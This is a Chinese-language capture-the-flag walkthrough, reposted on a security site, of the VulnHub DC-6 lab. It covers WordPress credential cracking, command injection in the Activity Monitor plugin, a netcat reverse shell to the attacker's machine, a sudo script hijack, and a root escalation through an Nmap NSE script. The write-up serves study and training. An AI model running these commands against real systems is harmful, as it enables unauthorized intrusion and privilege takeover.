【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

admin 2025年4月7日14:24:15评论0 views字数 2027阅读6分45秒阅读模式

靶场的搭建

从官网直接用迅雷下载就会快一点:https://www.vulnhub.com/entry/dc-6,315/,解压之后用vm直接打开ova文件即可,要注意一下靶机和攻击机(kali)要在同一个局域网内哦!!!,比如我这里的靶机和攻击机都是用net模式连接的网络

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

信息收集

主机扫描

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

得到靶场的ip为:192.168.2.139

端口扫描

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag开放的端口为22、80

目录扫描

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag有一个登录的目录

网站信息扫描

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag网址被重定向了,需要改一下hosts的配置文件,具体的原理你可以看一下我的dc-2靶场的解释

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag重新打开网址发现正常回显,而且我们可以发现它的指纹识别的cms是wordPress 5.1.1

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

信息收集总结

开放的端口:2080登录的目录:http://wordy/wp-login.php?action=register 系统cms是wordPress 5.1.1

漏洞利用

80端口

我们前面由80端口已经得到了系统的指纹识别

22端口

22端口开放,可以ssh连接,但是我们没有用户名和密码,无法直接连接,先放一放

cms的利用

cms是wordpress,而且发现了一个登录的页面,我们首先要先破解账号名和密码

密码破解

我们先尝试用cewl进行密码收集,发现行不通【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag再考虑用kali自带的密码字典usr/share/wordists/rockyou.txt,由于字典太大,我们先把密码过滤出来

cat rockyou.txt | grep k01 > dc6.txt
【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

账号名收集

在Wordpress中,有一个kali自带的工具,专门针对该wordpress系统的扫描工具

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag收集到了用户名,保存在文件dc6user.txt上

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

匹配账号名和密码

根据前面的字典,就可以得到账号名和密码:mark / helpdesk01【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

登录成功

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag我们发现有一个插件的工具activity monitor,可以利用这个插件漏洞进行远程命令连接

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

activity monitor插件漏洞

远程命令执行

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag我们发现管道符命令注入成功,说明存在漏洞,但是我们的输入长度被限制了,我们改一下长度,按f12找出maxlength函数,把15改大一点,我这里改到100

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

反弹shell

建立kali的监听端口

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

反弹shell

nc -e /bin/bash 192.168.2.129 7777
【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

反弹成功

进入交互式模式

python -c  'import pty;pty.spawn("/bin/bash")'

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag逛了一下home目录

graham用户

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag该用户下没有什么可以直接利用的信息或者文件

jens用户

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

发现有一个脚本文件,看了一下文件内容,暂时没有利用的方式

sarah用户

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

mark用户

发现有一个txt文件,里面有graham用户的密码GSo7isUM1D4,而且前面我们的信息收集已经知道靶机开放了ssh 22端口,我们可以用graham用户进行ssh连接

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

ssh连接

ssh [email protected]

登录成功

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag发现有一个可疑的目录lost+found,但是没有权限进不去,先查看一下目前用户能执行的文件

sudo -l

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag发现我们可以执行/home/jens/backups.sh脚本,脚本注释的信息提示我们先把/bin/bash写入脚本内,再用jens用户执行

echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

成功切换成jens用户,我们再来逛逛这个用户下有什么提示,不s心的我想看看lost+found到底有什么,发现还是没有权限,没办法只能先看看这个jens用户有什么权限

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag发现/usr/bin/nmap,但是要以root用户执行,root用户不就是我们想要的最终超级权限吗?不要激动哈哈哈,先看看/usr/bin/nmap里面有什么东西,里面的文件是一堆乱码,再想想

nmap的nse脚本提权

前面提示我们nmap可以执行root,我们可以Nmap的NSE脚本提权(NSE是Nmap的一个强大的功能,允许用户编写脚本来扩展Nmap的功能。)如果Nmap以root权限运行,可以通过编写NSE脚本来执行提权操作

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

所以我们先创建一个脚本并执行该脚本,这里要注意的是一定要在jens目录下执行该脚本才有权限

echo "os.execute('/bin/bash')">demon.nse //nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)

sudo nmap --script=demon.nse //执行此脚本

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

提权成功GET flag

已经利用nmap脚本成功提权到root,接下来就是进入root目录找flag啦

【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag
更多靶场信息感兴趣的师傅可以关注微信 公众号【Cauchy网安】,一起一步步慢慢来,该到达的高度终将会抵达的,加油,如有雷同纯属巧合

原文始发于微信公众号(Cauchy网安):【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flag

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月7日14:24:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【VulnHub靶场】DC-6——远程命令执行反弹shell与nmap提权渗透拿flaghttps://cn-sec.com/archives/3924313.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息